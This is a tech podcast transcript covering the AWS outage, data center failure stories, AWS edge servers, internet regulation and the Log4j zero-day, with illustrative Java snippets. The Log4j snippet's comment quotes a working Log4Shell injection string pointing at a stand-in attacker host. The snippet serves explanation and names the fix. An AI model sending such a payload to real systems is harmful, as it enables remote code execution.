This week we’re covering the latest news, from the biggest Zero Day vulnerability in history, to Dorsey’s departure from Twitter, to huge data center acquisitions, the AWS Outage, the Edge, and more...
James Thomason:It's The Next Wave Podcast, episode 53. I'm James Thomason, here with co-hosts Dean Nelson and Brad Kirby. This week we're covering the latest news, from the biggest zero-day vulnerability in history, probably, maybe, to Jack Dorsey's departure from Twitter, to huge data center acquisitions, the AWS outage, the edge, and a whole lot more. Before we get into things, though, how are you guys doing? I feel like I haven't seen you in a while; we haven't recorded in a couple of weeks. I personally was trapped living in an airport hotel in Dallas, going to the data center every day. Never let it be said that I'm not a hands-on CTO. We had petabytes of storage; it looked like we were wheeling bricks of platinum into a vault, but it was actually just hard drives. Disks are basically our platinum these days, if you've looked at the prices of disks.
Dean Nelson:So CTO means we can't throw you out. You're a chief tinkering officer, I think is how it works out. Petabytes of tinkering.
Brad Kirby:I felt really guilty when I was sitting in Italy and you were in a data center.
James Thomason:Yeah, I'm sure the guilt was overwhelming. Nothing fixes that quite like another glass of Chianti, I'm sure.
Dean Nelson:Wow. And another cheese plate.
Brad Kirby:It might have. It was the first time I had left the country in two years. So.
Dean Nelson:So how was that by the way?
Brad Kirby:It was good. It was nice, cold, rainy. Yeah, first time there in 767 days. A quick trip over Thanksgiving, so we took advantage of that downtime as well.
James Thomason:Well, this is our first show after Thanksgiving. My family rented the big mansion in Northern Alabama; we had the whole family there. Lots of turkey. Let's hope everyone had a great Thanksgiving. How was your Thanksgiving, Dean?
Dean Nelson:I actually drove down to Los Angeles. You know, my daughter's in that musical Love Actually, and she's doing eight shows a week. She is Natalie, and she is crankin'. So we basically went down for Thanksgiving; her only day off was Thanksgiving Day. Think about eight shows a week: she usually has Mondays off, but they shifted it to Thanksgiving Day because they were giving everyone Thanksgiving, I guess. We went down there, we hung out, we had a very small thing. It was great just to relax. We made some food up here in the Bay Area, drove down, and heated it up where she's staying. It was just fun. Then we drove to Vegas for AWS and all that stuff, and came back. And then we went and saw her opening show. So it was good. It was good.
James Thomason:And maybe that's a good place to start, with AWS. So you were at re:Invent, the big AWS conference. I was in the data center doing real work while you were at the trade show. But tell me, how did the cloud look from the outside?
Dean Nelson:I didn't go in. I actually was doing meetings outside, because it's insanely hard to get in there, and you spend a lot of money. But I had a lot of different meetings with people in the same hotels. It was very busy. I was watching all the announcements and having conversations with lots of people, but I wasn't hitting the floor.
Brad Kirby:You're both going to be in Hawaii together, then?
James Thomason:Oh, yeah, PTC. That's the plan, yes. Pacific Telecommunications Council. That'll be fun.
Brad Kirby:I'll be jealous of that.
Dean Nelson:Yeah, we'll have a cheese plate for you. How's that? There we go.
James Thomason:A pu pu platter,
Dean Nelson:Pu pu, yes, of course. I'll take it, a must-have. I also got my third jab, by the way. Since I had COVID earlier, it didn't affect me much, but my wife got knocked down for about four days.
James Thomason:Have you grown a new appendage or anything like that? No,
Dean Nelson:I haven't.
James Thomason:Oddly, no? Hardly? Well, I hear that's a side effect. A little ointment cures it right up, so you don't have to worry about it if it is.
Dean Nelson:All right. Well, sometimes I feel like I need a third hand.
James Thomason:Don't we all? Don't we all? Yes, we do. Well, Amazon had a big outage, like a major outage. And it was in US East, which is their biggest region, where, like, everybody's stuff is; that's the internet, for the most part. The outage started at 7:30 a.m. Pacific on Tuesday, December 7, lasted for five hours, and affected customers using all kinds of services in the region. Five hours in the cloud is a long time. That's a long outage for a major cloud service, right? I mean, that's probably up there in the list of all outages. Amazon had a really lengthy explanation of what went wrong, and it had to do with, basically, network devices getting overwhelmed, devices that were doing network address translation between two different parts of the Amazon services in US East. So that added to the latency, the latency created cascading effects, and pretty soon everyone is staring at their navel wondering what to do. Five hours of that. I'm sure that was a lot of fun for the internal teams at Amazon to deal with, an outage of that scale. There's definitely no pressure from executive management when the clock is ticking on every single customer that you have in the region. So congrats to the team over there for resolving that outage, even though I'm sure it wasn't fun.
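For the curious, the standard client-side guard against exactly this failure mode, synchronized retries piling onto already congested devices, is capped exponential backoff with jitter. A minimal sketch in Java; the names and numbers here are illustrative, not anything taken from AWS's post-mortem:

```java
import java.util.concurrent.Callable;
import java.util.concurrent.ThreadLocalRandom;
import java.util.concurrent.TimeUnit;

// Capped exponential backoff with "full jitter": each retry sleeps a random
// amount up to an exponentially growing ceiling, so clients don't stampede a
// shared dependency in lockstep when it slows down.
public class JitteredRetry {
    static <T> T callWithRetries(Callable<T> call, int maxAttempts) throws Exception {
        final long baseMs = 100, capMs = 10_000;
        for (int attempt = 0; ; attempt++) {
            try {
                return call.call();
            } catch (Exception e) {
                if (attempt + 1 >= maxAttempts) throw e;
                // Sleep a random duration in [0, min(cap, base * 2^attempt)).
                long ceiling = Math.min(capMs, baseMs << Math.min(attempt, 20));
                TimeUnit.MILLISECONDS.sleep(ThreadLocalRandom.current().nextLong(ceiling));
            }
        }
    }
}
```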
Dean Nelson:Yeah, outages are no fun. I've got my share of scars throughout the industry. And the fact is, this one came right after the Facebook outage. If you think about the Facebook one, that was really a network configuration thing that cascaded rapidly all over the world. This one was DNS, right?
James Thomason:Oh, the ultimate impact was on DNS, right. So you had this congestion, which slowed down NAT, which disrupted the network, which disrupted DNS, which disrupted everything. That's my understanding, at least, from a cursory reading of the rather long and wordy explanation of what happened. But kudos to Amazon for being pretty transparent about exactly what transpired to create the outage. But yeah, sooner or later, you're going to have to have people who understand how the internet works again. So I'm looking forward to coming out of retirement at the age of 70 and making $4,000 an hour to explain how DNS works, and how to fix ancient routers and ancient NAT boxes that no one knows how to fix anymore. It's going to be like the retired COBOL programmers coming out of retirement for the military, who are getting hundreds of thousands of dollars to resurrect some piece of code.
Brad Kirby:Cloudflare had that happen recently as well. A similar outage, but it came down to the network. So, yeah.
Dean Nelson:If you look at the cascading effect of this, this is the thing that scares infrastructure leaders the most: what don't you know? What parts are going to start to affect the next step? Because the dominoes start to fall, and that's exactly what happened in each of these outages. The architecture is supposed to put together these canaries, right? The canary in the coal mine limits the blast radius, and the blast radius allows you to say, I can contain it to a certain area, versus letting it cascade. But in the Facebook outage, I was talking to a CISO at another company, and they had reached out to Facebook specifically to ask, hey, is this a DDoS attack that's going on? Because they were up and down for like eight or nine hours, and it impacted Instagram and all types of things. And he heard from them that it was actually a network configuration automation, and it propagated so fast they couldn't stop it. What it did is wiped out routing tables everywhere. And it effectively bricked devices, so they had to physically go to the data centers.
James Thomason:That's right. And that's what took so long, actually. And I think that's the funniest part of it: the keycard access that they had built onto the cages inside the data center, to allow employees to get in to the equipment and work on it, very secure. Except, in fact, when the network went down, those keycard readers stopped working, and no one could get into the cage. They actually had to wait on someone; this is what I heard third-hand, from maybe an insider, so who knows, 100%, the truth of this. But the rumor was that they had to get in with a grinder, and they were waiting for a guy to show up and grind the cage open to actually physically get in. So they couldn't go in and fix the problem until they had cut their way into the cage, because the keycard reader was tied to the network, and the network was down. Which, if that's the truth of it, I think is hilarious. And that's exactly the sort of thing that happens when you blow off your own leg in this space, right? When you're running high-availability infrastructure, it's always some sort of cascading problem that results in you being a complete dumbass at the end of the day. It always ends the same way.
Dean Nelson:Totally. And I don't mean to laugh; I'm actually chuckling because of the pain that I've felt in my own right. I'm gonna walk you through a really quick outage that I had at a company I worked at; I'm not gonna say who it was. But it was exactly the same cascading effect, and you reminded me that it impacted the network. Ultimately, we had a facilities technician going into this big air conditioning unit. It has these variable frequency drive pumps and everything in it for water flow and all the stuff into the data center. So they do a regular scan, an IR scan. Basically, an infrared scan says: I'm scanning this device, and I'm seeing if something's hot. And what they found was that some of the capacitors within this variable frequency drive, which regulates the motors, were going bad. So they scheduled maintenance and took the entire unit offline. It's massive, about a 2,000-ton unit, and underneath it is where all this pumping stuff is at. So they're in there, they take it offline, there's enough redundancy across all this, it's fine. And they start changing out all the capacitors, put it back together following a procedure, and then they flip the thing back on, and it blows up. Right? All the capacitors implode. It all blows up.
James Thomason:It's all about keeping the smoke inside, too. Once you let the smoke out, that's real, real tough to get back in.
Dean Nelson:But just like we said, you should be able to have this containment, because he took it offline, right? So what happened, though: he stepped back, per protocol, because you don't want to kill anybody on this. He stepped back. Seven seconds later, it lit up again. So it's dead, and then it energized again, right? And he's like, what's going on? And I got a call that we had some type of network issue in a whole other region. What had happened was, this tech, when he did this, came back out and realized, wait, I don't have access to anything. He had put in a capacitor backwards, and so it was a ground fault. When the energy came up, it sent this ground fault right up to the main, okay, and that main has a ground fault protector in it that's supposed to stop it. It's just like your house, right? A relatively nice house has GFCIs. Same thing here, but it was so fast, and we found out later that the commissioning on the data center wasn't done correctly, so it went right through that breaker and went to the main. And that's a 4,000-amp main, okay? So that main did its job: 4,000 amps, it shut off. So basically, B went away; A is supposed to stay on, okay, keeping all the pumps and everything else going. Well, internally, what they found was this. We have an automatic transfer switch, because what happens in data centers is you're watching the utilities: you've got an A feed and a B feed. When you lose A, it sits there, waits, says, oh, I lost power, and seven seconds later it transfers to B. They don't expect to have an outage internally. So it looked like the utility went away, which means that that automatic transfer switch transferred the ground fault to its partner, and so the other 4,000-amp main went down as well. Excellent. Which means the entire cooling system went off, the pumps all stopped, right? In a very large data center, which means all that water stopped flowing, which means the data halls, three of them, all of a sudden overheat. Everything went thermal, and they all started shutting down. But at the same time, we lost network, and no one could figure out why. And we found out that the two network MMRs, the meet-me rooms, were on the same electrical distribution as the cooling system. So you've isolated the data halls, and those went down. And it gets better, hold on. When that went down, everyone thinks there's an outage in a whole other area, because there's no more network. But losing everything in there exposed another bug. Because, first off, we had all of the security cards, the badge readers he talked about, right? They were on that same electrical distribution, which means the magnetic locks on the MMRs locked shut with a full-on bolt. Right? So the network rooms were sealed. So here the data center guys are freaking out, trying to figure out what's going on; we'd lost power across everything. Then they realize what's happening. We're on the calls, trying to figure out what their mitigation is. They took this unit offline, re-energized, turned it back up, wanting to make sure it wasn't gonna cascade again. They did that, and then they finally get into the network room.
And all of the routers on one side, for one of the corporations, were bricked. All the Cisco 6500s literally would not boot anymore. Because that exposed the other bug we'd found, where Cisco said if you lose power on both sides, it actually wipes out the firmware on the controller cards on the 6500. We'd found that before and replaced it, but only on one side; we'd done all that upgrade on one side, and the other side hadn't been done yet.
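To make the failure mode in Dean's story concrete: an automatic transfer switch only sees "power present or power lost" on each feed, so a downstream ground fault that trips one main is indistinguishable from a utility outage. A toy model in Java of the logic he describes; every name here is illustrative, and real switchgear is vastly more involved:

```java
// Toy model of the automatic transfer switch (ATS) behavior in the story.
public class TransferSwitch {
    enum Feed { A, B }

    private Feed active = Feed.B;

    // Invoked when the active feed's main breaker opens, whatever the cause.
    void onPowerLost() throws InterruptedException {
        Thread.sleep(7_000); // wait seven seconds, per the story, then transfer
        active = (active == Feed.B) ? Feed.A : Feed.B;
        System.out.println("Transferring load to feed " + active);
        // If the load itself is faulted (a reversed capacitor causing a ground
        // fault), this just moved 4,000 amps of fault current onto the healthy
        // feed -- now both mains trip, and cooling, MMRs, and badge readers
        // all lose power together.
    }
}
```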
James Thomason:When you say you "found that," it means you hit a bug in production, no doubt. So you got to experience that firsthand. And you know, this stuff is so easy to get wrong. The way it's actually done, to try to prevent these kinds of errors from cropping up, is we live off of checklists, right? Everything we do operationally, there's a checklist, like a pilot doing his pre-flight check, or launching a rocket into space. There's a checklist for everything: plug this here, plug that there, make sure this label's right, red to red, black to black, all that stuff. And it's still so easy to screw up. And I can testify to that, putting my sore arm back into a data center again this week. It's never, by the way, a good idea to send your CTO; even though they may know how to do it, it doesn't mean they're going to be good at it anymore. And so things definitely took longer than they should have. But I feel for the operations teams, because these things are always going to happen. Chaos is always going to ensue, and there's nothing you can do to prevent unknown, unpredictable cascading failures from happening. You have to plan on failure happening, and plan on the recovery: how do you start from zero and triage to recovery, starting with very basic things, especially when dealing with failures, and work your way back up the decision tree to the complexity? The way things manifest sometimes is just like your observation that another piece of the network is down, which seems tangential to the problem that you're working on. I don't know if you've been through this, but when you're a technical person in a firefighting scenario like this, invariably some well-meaning colleague will come up and explain the bizarre behavior of something that they are seeing. You just want to tell them: look, I know that you have summoned Beelzebub over there, but I am in the midst of this issue, untangling a rat's nest of cables, literally. If you just wait, everything will be fine. When you get these cables plugged back in, everything will be fine. Trust me.
Brad Kirby:Speaking of firefighting, my worst situation was actually when I was at, I won't say the company, but it was during a quarter-end, where our financial systems went down because the data center actually caught on fire. And the DR did not work, pardon my words, for over two weeks. Wow. Holy crap. Two weeks.
James Thomason:Two weeks, versus about a five-hour Amazon outage.
Dean Nelson:This is the whole point of business continuity planning, right?
Brad Kirby:Yeah, I know. When I worked at Deloitte, we did a ton of that. We were like the DR site; we were the place to go for most of the hedge funds and financial service providers there. So I know quite a bit about it.
Dean Nelson:This goes right back to what James was saying. Sorry to go into this detail on it, but it also is about testing. I mean, there's a reason Chaos Monkey was created. They did that to inject faults all over the place, so that people would have to go back and plan for failure. And with a lot of this infrastructure especially, nobody wants to be the one to say, yep, let's take the data center down and validate.
James Thomason:Well, hold on, for those listeners not in the know of this particular domain: Chaos Monkey is a software tool which simulates failures by randomly doing bad things to your infrastructure, like shutting down ports, power cycling equipment that shouldn't be power cycled, and generally creating chaos, hence its name, Chaos Monkey. And that's a good way to sort of stretch your wings, exercise the team, and figure out if you're able to recover from these types of failures. It's a good practice. It's like a team doing a scrum or something, right? You're out there in a firefighting scenario and you're keeping your skills sharp. Things may not go wrong for a really long time in the data center world; I mean, things just run most of the time. It's only the two tenths of one percent of the time that it goes down that everyone wants to pay attention to who you are and what you do. And suddenly you're the most important person in the company, and then they forget about you for the next four years.
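The core of the idea James describes is almost embarrassingly simple. A toy sketch in Java; the Instance type and terminate() call are placeholders, not Netflix's actual API (the real Chaos Monkey terminates cloud instances on a schedule, with opt-outs and guardrails):

```java
import java.util.List;
import java.util.Random;

// Toy Chaos Monkey: pick one instance in a group at random and kill it,
// forcing the team to prove the fleet can absorb the loss.
public class ChaosMonkey {
    interface Instance {
        String id();
        void terminate();
    }

    private final Random rng = new Random();

    void unleash(List<Instance> group) {
        if (group.isEmpty()) return;
        Instance victim = group.get(rng.nextInt(group.size()));
        System.out.println("Chaos Monkey is terminating " + victim.id());
        victim.terminate(); // a healthy system recovers without customers noticing
    }
}
```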
Brad Kirby:I will say that the treasury system I implemented was still working fine. But that's a separate story. Not to brag.
Dean Nelson:Just to wrap this topic up: if you think about the lessons learned from the people who have the scars, it's that if you're not testing your systems, Murphy will test them for you. No matter what, there's going to come a day where something happens because it wasn't planned for, and all of those little things that you haven't looked at are going to come back and bite you. So it is worth it. And executives, as I said, listen to this one: support your teams to actually do it. Because in the end, you're going to avoid things like this.
James Thomason:Yes, it's not the chaos, it's how you respond to it, how well trained and prepared you are to deal with it. Because chaos is going to happen no matter what; you'll never be able to flush out the unknowns. Plan for failure. Well, apart from the outage, Amazon had a big week with its trade show, and you were there, lurking outside, not going inside. I don't blame you. I had lots of friends and colleagues at the show, and it just looked like a great breeding ground for new variants of COVID, that's what I saw, the large numbers of people packed into AWS re:Invent. I don't necessarily like going to trade shows anyway. Too big of a show, too much going on. But one of the more interesting announcements that came out of the show was that Amazon is starting to pay a lot more attention to the edge. Go figure. Go figure. So Werner Vogels, the CTO, was on stage, and he said, you know, we've already seen the cloud practically go everywhere. The shift we'll witness in 2022 is the cloud becoming highly specialized at the edges of the network. So suddenly the edge is kind of becoming important to Amazon, and I think this is a sticky point, which I'll come to in a second. Amazon today operates in 25 different geographic regions. It's massive, right? $60 billion of revenue, 81 different availability zones, 310 points of presence serving 245 countries and territories. So that's the biggest of the big. The scale problem, though, we haven't even started to feel when it comes to the edge. We've talked several times about data growth, and the fact that we're going to hit somewhere between, depending on who you ask, 170 and 250 zettabytes of data by 2025. At that kind of scale, just to put this in perspective: to copy 10% of that data back to the cloud and process it would take five and a half years, if you dedicated the entire internet's bandwidth to the project. It's never, and I'll say never with four asterisks, but never going to be economically or even technologically viable to move data back to the cloud to process it essentially the way we do. And I think Amazon is beginning to capitulate to this notion, probably because it's what their customers are telling them, but also because this is an inevitability, right? And so the sticky spot is that this requires deploying infrastructure at the edge, which, shameless plug, that's what my company's doing, right? We saw this opportunity early; we're out there building this edge, deploying tens of thousands of PoPs. The difference for us is that we don't have a cloud infrastructure that we're trying to make money with, that we've already invested in. And so I think the biggest challenge for Amazon and Google and Microsoft, all these companies, is that they now have to invest net new in building out the edge, and that's going to make them very tempted to try to do that. And so they announced the new Outposts servers, which are 1U and 2U data center servers, not really an edge form factor; they're pretty large boxes. They do look cool. I think the small one is a Graviton2; that's Amazon's internal silicon.
Which, by the way, I think is one of the ways that they are going to continue to differentiate: creating their own chips to do the specialized things that they need in their hyperscale environments. But that's Arm, that's Graviton, 220 gigs of memory, about four terabytes of storage. And it goes all the way up to a two-rack-unit box that's an Intel Ice Lake x86 with 256 gigs of RAM and about eight terabytes of storage, all solid state NVMe. Those devices, they are provisioning at a cost of about a thousand bucks a month for the large one. Or you can buy down the cost, just like you can with reserved instances, for nine or seventeen grand, I think, respectively, for each one of those. But this is an uncomfortable moment, right? If this goes too far, and I predict it will necessarily go too far, I think this is where the tension in the architecture comes from. It's the idea that you're merely extending what Amazon calls local zones, local availability zones, and you're gonna manage them the same way. Because at a certain point that becomes untenable, right? There are too many, and you require a human being to think about how that works, and how it should work, and how the software you're deploying is going to talk to the other software you're deploying, and database instances. And that's where this whole thing, I'm calling it early, you know, I think the end of the cloud model is nigh. I believe in it so much, I started a company to try to profit from it. And we may not necessarily be the winners there; I hope we will be, we're trying very hard to be. But here it is, right? Here it comes. I think Amazon's once again ahead of the curve amongst their peers, their competitors, right? And I have to hand it to them: their ordering experience. They really got their kinks worked out, I think, with Snowball and the other kind of edge devices. The ordering process, et cetera, for getting one of these servers on premises is slick and easy, and they're operationalizing it for you, so you don't have to do anything more, really, than plug the cables in and make sure it gets a DHCP address, and then you've got a local zone. I say that and they're my competitor, but credit where credit's due: it's a pretty polished, clean experience, and one that leverages the Amazon supply chain to do what they're good at. So I have no doubt that they're going to be tremendously successful in this space. But here they come. So expect the dominoes to fall in 2022; the other guys will be pushing in right behind to try to crowd into the space, but totally limited, because they're going to cannibalize their existing investment in R&D. That's the rub.
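A quick back-of-envelope check on the "five and a half years" figure James cites above. The inputs are assumptions, not numbers from the episode: a roughly 175-zettabyte forecast for 2025 and roughly 800 Tbps of aggregate internet capacity:

```java
// Rough sanity check: how long would it take to move 10% of the world's
// data over the entire internet's bandwidth? Both inputs are assumptions.
public class EdgeDataMath {
    public static void main(String[] args) {
        double bytes = 0.10 * 175e21;     // 10% of ~175 zettabytes
        double bitsPerSecond = 800e12;    // ~800 Tbps aggregate capacity
        double seconds = bytes * 8 / bitsPerSecond;
        double years = seconds / (365.25 * 24 * 3600);
        System.out.printf("~%.1f years%n", years); // prints ~5.5 years
    }
}
```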
Dean Nelson:Well, the way I look at this is that this is validation. We've been talking about the edge for a while, right? And the cloud players have been trying to figure out what it is that they're going to do. Before, they defined a zone, or sorry, an Outpost, as a rack, right? But when they go into a region, they usually go into three large zones, right? And those are big, I mean, we're talking megawatts, tens of megawatts worth of capacity in zones. Those are the big regions we're talking about. So they've gotten smaller. Now they're saying, we're gonna do a zone, meaning not a region but a zone deployment. And now they've gone down to an Outpost rack, and then to a server that you can deploy in your own rack. The validation is that it's pushing out towards the actual data; it's pushing out to where the workload is. What I will tell you, James, is that it's okay to get one percent of the cloud market.
James Thomason:Yeah, it is okay. Yeah, that would be okay.
Dean Nelson:That's a $25 billion market.
James Thomason:I'm good with that.
Dean Nelson:It's okay to take $3.4 billion of that, and it's almost noise on the Amazon side. But you're right that all of these other cloud players are going to be coming in, because they're all figuring out their edge strategy. So Microsoft, right, Azure has got their edge development, doing the same kind of thing. Same with what Google is doing; they're leveraging what they've done for their network edge, which Uber used to use, right, and others use, for TCP terminations and things. But there's going to be so much data and so much demand, and then it's going to come down to capacity and price again, right, and the types of workloads that are going to be on there. It's a very big space, and lots of players are going to be in it. I mean, I'm seeing it on my side.
James Thomason:All the cool kids are building edges, okay? And five years from now, no one's gonna care about Kubernetes, or containers, or any of that stuff. It's all going to be about the edge and these big distributed computer systems. So I'm tremendously excited. And, in a way, you never want to see the sandworm turn its attention in your direction, but luckily there are other sandworms that the sandworm has to fight on Dune. So, again, exactly: if we just snatch up a mere one or two or three percent of the market, that's a really good starting point for little guys like us. Well, a good segue there: there's an article in The Register covering a study on internet technical success factors, which was commissioned by APNIC and LACNIC. Those are regional internet address registries, if you don't know what that is. It's kind of a big, comprehensive paper. What they were looking at is: why did the internet work? We tried to build global networks for a long time in various other ways. Why did the internet model work? Why did it take off? Why did it succeed? Why does it continue to succeed? And what are the architectural tenets, the characteristics of the internet, that we want to try to preserve? I think this stuff tells another story we'll get into in just a second. But they basically identified five things. The first was scalability: the ability, as a truly distributed system, to keep adding more infrastructure and scale it. Then flexibility in the networking layer, so you don't have to reprogram the entire internet, from a networking standpoint, when you plug in a new device. And that was not always true in computer networking: when you plugged in a new thing, you had to tell all the other things about the new thing, which was tremendously painful in various pre-IP networks. And those two things together make it tremendously adaptable to new applications. So again, you know, there's this loose coupling between the applications and software and the underlying infrastructure. And last but not least is resilience in the face of outages, you know, like Amazon's. So even though Amazon was down, and a ton of stuff with it, the rest of the internet went humming and singing right along. Amazon's competitors, no doubt, are clapping wildly and breaking out cigars in the boardroom. But this is interesting, because we're at a juncture in time where, call it the foundational principles of the internet that came about in the early 1990s and sort of stuck with us through the 2000s, are starting to get challenged, primarily by big government. And so what's happening is that, in this report, for example, they call out the amount of traffic that's moving across private networks, inside of places like Amazon, as a potential risk to these architectural tenets, because those are areas where proprietary technologies could emerge that break some of these architectural tenets overall. And the government is looking at this and saying: well, since we've had this free and open internet, since the 1990s, bad things have happened. You know, we've got massive propaganda. Big governments like Russia and China are using this to spread disinformation and screw with our democracy. Therefore, we should reevaluate whether we really want to have a free and open internet anymore. Do we really? Do we really want that? Or shouldn't we step in and regulate all this stuff?
And make sure that things are done in exactly the way that the government wants them done at all times?
Dean Nelson:Yeah, that sounds like a great idea.
James Thomason:Yeah, it's gonna be great. So there was a leak. And this was not a paper; in fact, the heading of it said "not a paper." But there was a leak from the Biden administration, which is expected to launch this Alliance for the Future of the Internet. And by the way, whenever you hear a title like that for a government entity, it is almost invariably a horrible thing; it's the exact opposite of what it claims to be. The formation of the alliance, said the not-a-paper leaked document, was in response to two major trends. The first is the rise of an alternative vision of the internet as a tool of state control, promoted by authoritarian powers such as China and Russia. And the second is the need to reassess the aspirational vision of the internet that prevailed from the 90s to the 2000s, in light of challenging developments, including a worldwide misinformation epidemic, the concentration of power among a small number of dominant tech companies, and the rise of cyber attacks and other security concerns. So we're at a juncture where we really could destroy the internet, by allowing people who don't understand it to come in, build regulations, put rules into place that might be well-meaning in a sense, but ultimately break the architectural tenets which are in place, which have made the internet successful in the first place. The proverbial slaying of the golden goose, right, to find out what makes her tick inside. What do you think about this, Dean?
Dean Nelson:Well, the initial principles for the internet were three: openness, simplicity, and decentralization. Those three things have stuck. The first thing is, if we get a government entity involved in this, regulating and controlling it, we're gonna slow everything down, and that doesn't seem like an open thing. The second thing, for me, comes down to this: we don't want to blame the technology for the bad use. If you look at these campaigns, you look at all the stuff that's going on, it's the application of the technology that's enabling these misinformation campaigns, and, you know, governments that are actually using this for launching other things, like what we've talked about before. No matter what, the technology is going to be used either for good or for bad, and I don't think regulation like this is going to solve that problem at all. It just basically makes an authoritarian-type system to say, this is how things are going to be done, and that will have implications in and of itself. So I think that the technologists, just like we had with the internet at the beginning, should be defining how the technology can remain open and secure and controlled, not the government agencies coming in to do it. If you think about ARPANET and all the others, they were enabling the funding and the development of the technology, but they weren't actually defining or controlling all aspects of it. They were enabling the people to innovate and come up with the solutions that needed to be there.
James Thomason:Do you remember what the first message was that was ever sent on the internet, between UCLA and Stanford, on the very first network?
Dean Nelson:I remember that. I was at UCLA when they did the 50th anniversary, and they said that, I forget what the word was, but they didn't have enough memory to send it.
James Thomason:Yeah. So it was at Boelter Hall, on the south campus of UCLA, and there's a student on the telephone with a colleague at Stanford. The student was Charley Kline, in a research group headed by Leonard Kleinrock. And they're trying to do something really simple: Kline is attempting to type the word "login," which is a pretty important word, to the remote computer. So he types the first character; he's going slowly, right, so he's on the phone: did you see the L? I got the L. Okay, good. And he hits O. Did you see the O? Got it, O. And when he hits the G, the whole thing crashes, right? So the first message was "lo." Lo and behold, the internet.
Dean Nelson:It should have had another l
Brad Kirby:There's actually a documentary about that. I watched that as well. But yeah, I think it was...
James Thomason:Didn't Werner Herzog do that documentary? Exactly. Yeah, I watched a piece of that a while back, when I was rewatching his 1978 film about the colonization of South America by the Spanish, which was disturbing. Everyone should watch that. It's a great film.
Dean Nelson:What's it called? Crap, it starts with an A.
James Thomason:Lo, lo.
Dean Nelson:Lo... colonization...
James Thomason:Why am I drawing a blank on the name?
Dean Nelson:You can't have a senior moment, man. You can't, not right now. You're not old enough.
James Thomason:I am totally having a senior moment. Ironically, I watched that when I was young, and what it was: when I was in the data center for days and weeks on end, I actually went back and rewatched that documentary during that. So...
Dean Nelson:Nice. All right. Well, researching... Aguirre. Aguirre! That's what it was: Aguirre.
Brad Kirby:That was two seconds away. Okay.
James Thomason:Aguirre, the Wrath of God. That's the movie. That's a great, that's a great film, still.
Dean Nelson:Okay, Aguirre, the Wrath of God. 1972. '72.
James Thomason:Okay, so it was earlier than I said; I said '78, but it was the early '70s. That's a great film. Weird soundstage in that film, but very cool, very cool movie. That was before Herzog was like a documentary guy, which he is well known for these days, making lots of documentaries.
Brad Kirby:So we were talking about Amazon's outages, but there was a massive zero-day bug that was discovered last week. Amazon, Apple, Tesla, all the major companies have said they're extremely vulnerable right now. It's Log4j, right? Effectively, they think it's going to affect about 200 million devices, and there were about a million hacking attempts over the weekend, in a couple of days, from your typical kind of cyber criminals out there that have their own ransomware and whatnot. So I'm still terrified of that. I think it's just getting worse. Like, when you have this open source project, and the CEO of Cloudflare comes out and says the bug has actually been open since 2013. Nobody knew about it, though, until about December 1 of this year. And then when Apache announced it, that's when it went. Once it's released, it's out there in the wild.
Dean Nelson:By the way, here's how to hack me. I wonder how many people go...
Brad Kirby:It's not easily patched, because it's so pervasive across architectures.
James Thomason:Well, this is why, you know, I have never liked Java at all. Java is the devil's concubine; that's what I've always said. Mr. Gosling would not like to hear that from me, he would not like to hear that, and I met him, I admit. And I acknowledge the good things that Java helped push forward technologically. But I've never enjoyed programming in Java, and I've certainly never enjoyed running Java apps in production at large scale; there are better things to do. Log4j is exactly what it sounds like: it's a library to help you emit logging messages from your Java code. There are built-in mechanisms for this, like System.out.println, that do this. The problem with those is, of course, you need to get your logs formatted in a certain way and stuck into a certain place, because logs generate data, and data becomes unmanageable. So I would say, like, everything uses Log4j. It's been a while since I've been in the Java ecosystem, owing largely to my hatred of it, but I would say back then everybody used Log4j. It's just one of those fundamental little open source libraries that ends up getting included in everything. So it's hard to overstate the impact of this one. Literally probably every Java project of significance out there has got Log4j in it. No offense to the creators of Log4j; thank you for your contribution to the open source community, managing logs up to this point. And again, bugs like this can happen to anyone. I have had security vulnerabilities filed against my own code. There's no programmer on Earth who's written a lot of code who hasn't done something that they just didn't see at the time they were writing it that created a vulnerability. So we all do it; it's just inevitable. Poor bastards, right? But this is a big one. It will take years to mitigate fully, I think.
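To see why this one was so nasty: with a vulnerable Log4j 2 on the classpath, merely logging attacker-controlled text was enough to trigger remote code loading (CVE-2021-44228). A hypothetical sketch; the handler and names below are illustrative, not from any real codebase:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    void handleFailedLogin(String username) {
        // In unpatched Log4j 2 (the lookup code dates to 2013), a username like
        //   ${jndi:ldap://attacker.example/a}
        // makes the logger perform a JNDI lookup and potentially execute
        // attacker-supplied code. The fix was upgrading to a patched release
        // (2.17.x at the time of this episode); the log4j2.formatMsgNoLookups
        // flag was the widely publicized stopgap.
        log.warn("Failed login attempt for {}", username);
    }
}
```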
Dean Nelson:Is it that hard to actually go back and undo?
James Thomason:It's not that; it's just that everything will have to be rebuilt and redeployed. That's the nature of Java, right? You're gonna have to make new builds of everything and get them out there. So imagine doing that across the entirety of Uber's production; it would take a while, even for a company like Uber that kind of had their act together for that sort of thing. Then imagine being the kind of company that experiences a data center outage for two weeks, whoever that was, and how long it would take them to mitigate something like this, or even identify that they have it.
Dean Nelson:Man, how many zero-day bugs are out there? Think about it. This one was eight years in the making.
James Thomason:Yeah, the answer is: a lot. And they're probably hoarded by state actors, for the most part, to be used as really one-time-use strategic weapons that you can deploy. Speaking of which, I don't know if you saw this news, or if it's even news or just wild speculation, but I keep a watch on kind of the military-industrial news, and there was a lot of speculation that China is deploying weapons, missiles, inside of containers, which are affixed to ordinary container ships, that can be activated at any moment to forward-deploy and, you know, attack any port that they might be sitting in. So, like, intermediate-range missiles. And these are basically undetectable, because they're sitting inside of containers, right? Unless you're inspecting every single container. And if the ship is sitting off your port, you know, has it come into port yet? How would you know? And of course, that violates probably every treaty and naval convention there is, in terms of hiding active weapons on civilian ships like that. But that doesn't mean that they wouldn't do it. I don't know if there's any truth to it, but it did flash across my screen the other day, and I thought: that is, like, evil-genius-level stuff, right? To put intermediate-range missiles into containers, and then, boop, hit a button and you just annihilate a bunch of your enemy's ports. That's a one-time-use thing, right? So, Dean, are you scared of forward-deployed Chinese missiles?
Dean Nelson:I'm scared of anybody who's going to put some kind of weapon inside of a country that isn't theirs, that can be remotely executed? Yes.
